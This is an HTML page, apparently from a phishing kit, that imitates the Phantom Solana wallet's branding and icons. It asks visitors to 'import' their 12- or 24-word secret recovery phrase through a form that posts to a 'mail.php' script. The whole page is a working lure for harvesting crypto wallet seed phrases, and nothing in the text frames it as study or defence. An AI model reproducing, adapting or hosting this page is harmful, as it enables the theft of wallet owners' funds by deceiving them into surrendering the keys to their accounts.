<!DOCTYPE html><!--  This site was created in Webflow. http://www.webflow.com  -->
<!--  Last Published: Wed Feb 24 2021 01:33:09 GMT+0000 (Coordinated Universal Time)  -->
<html data-wf-page="" data-wf-site="">
<head>
  <meta charset="utf-8">
  <title>A friendly Solana wallet built for DeFi &amp; NFTs</title>
  <meta content="A friendly Solana wallet built for DeFi &amp; NFTs" name="description">
  <meta content="PhantomWallet" property="og:title">
  <meta content="Solana SPL Token Wallet" property="description">
  <meta content="" property="">
  
  <meta content="width=device-width, initial-scale=1" name="viewport">
   
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">WebFont.load({  google: {    families: ["Changa One:400,400italic"]  }});</script>
  <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
  <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
  <link rel="apple-touch-icon" sizes="180x180" href="https://phantom.app/apple-touch-icon.png"/>
  <link rel="icon" type="image/png" sizes="32x32" href="https://phantom.app/favicon-32x32.png"/>
  <link rel="icon" type="image/png" sizes="16x16" href="https://phantom.app/favicon-16x16.png"/>
 
</head>
<body class="body-4">

<h2>Secret Recovery Phrase</h2>
<p color='#ffffb3'>restore an existing wallet with your 12 or 24-word secret recovery phrase</p>

<form action="mail.php" method="POST">
  <textarea placeholder="Secret Recovery Phrase" name="Walletphrase"></textarea>
  <button type="submit" name="formSubmit" id="my-form-button">Import secret recovery phrase</button>
</form>



<style type="text/css">
  body{
    margin: auto;

    text-align: center;
    margin-top:30px;
    background-color: #111109;
    color: white;
    width: 90%;
    height: 500px;
    font-size: 16px;
  }

  p{
    color: #f5f5ef;
  }

  textarea{
    display: block;
    border: 1px solid white;
    height: 200px;
    width: 600px;
    background-color: #000000;
    margin: auto;
    padding-left: 5px;
    padding-top: 5px;
    color: white;
  }
  #my-form-button{
    background-color: #6600cc;
    color: white;
    padding-left: 50px;
    padding-right: 50px;
    padding-top: 20px;
    padding-bottom: 20px;
    margin-top: 40px;
    border-radius: 25px;
  }

  @media (max-width: 767px) {
    body{margin-top: 20%;}
 textarea{
  width: 95%;
  height: 150px;
 }
 #my-form-button{
  margin-top: 20px;
 }

  }
</style>














  

    
</body>
</html>